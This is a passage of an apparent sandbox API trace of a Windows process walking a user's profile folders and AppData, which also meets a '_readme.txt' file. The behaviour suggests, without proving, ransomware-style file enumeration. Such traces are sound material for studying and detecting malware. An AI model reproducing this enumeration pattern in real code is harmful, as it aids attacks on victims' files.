Flags=0x0, Size=0x40) returned 0x2cddea0 [0184.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.838] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0184.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.838] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0184.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0184.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.839] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0184.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.840] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0184.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.840] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0184.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x310) returned 0x2d08630 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93ba0 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaad8 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93b58 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93b10 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93ac8 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93e28 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93e70 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93eb8 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93f00 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93f48 [0184.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0184.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93f90 [0184.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93fd8 [0184.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94020 [0184.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94068 [0184.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e940b0 [0184.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e940f8 [0184.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94140 [0184.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0184.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0184.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93be8 | out: hHeap=0x620000) returned 1 [0184.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93c30 | out: hHeap=0x620000) returned 1 [0184.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93c78 | out: hHeap=0x620000) returned 1 [0184.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93cc0 | out: hHeap=0x620000) returned 1 [0184.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93d08 | out: hHeap=0x620000) returned 1 [0184.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93d50 | out: hHeap=0x620000) returned 1 [0184.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0184.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93d98 | out: hHeap=0x620000) returned 1 [0184.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0184.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93de0 | out: hHeap=0x620000) returned 1 [0184.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0184.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0184.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0184.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0184.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0184.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.916] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0184.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.917] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0184.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0184.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.918] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9873ac90, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9873ac90, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0184.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0184.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.918] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda323040, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0184.919] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda323040, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0184.919] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0184.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.920] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0184.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0184.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0184.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0184.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0184.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0184.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0184.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ac0 | out: hHeap=0x620000) returned 1 [0184.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0184.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0184.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0184.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cc8 | out: hHeap=0x620000) returned 1 [0184.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ca0 | out: hHeap=0x620000) returned 1 [0184.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c78 | out: hHeap=0x620000) returned 1 [0184.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0184.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c28 | out: hHeap=0x620000) returned 1 [0184.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c00 | out: hHeap=0x620000) returned 1 [0184.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83bd8 | out: hHeap=0x620000) returned 1 [0184.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839a8 | out: hHeap=0x620000) returned 1 [0184.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0184.926] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.926] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0184.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0184.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.926] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0184.926] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.926] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.926] PathFindFileNameW (pszPath="") returned="" [0184.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.927] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.927] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.927] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd866c6e0, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xd866c6e0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83fe8 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.927] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0184.927] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98c239f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98c239f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0184.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0184.928] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98c239f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98c239f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0184.928] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.928] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.928] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Application Data\\") returned="Application Data\\" [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0184.928] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0184.928] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.928] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.928] PathFindFileNameW (pszPath="") returned="" [0184.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.928] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Application Data\\*" (normalized: "c:\\users\\keecfmwgj\\application data\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98c239f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98c239f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0184.929] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.929] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\") returned="Contacts\\" [0184.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0184.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.929] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0184.929] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.929] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.929] PathFindFileNameW 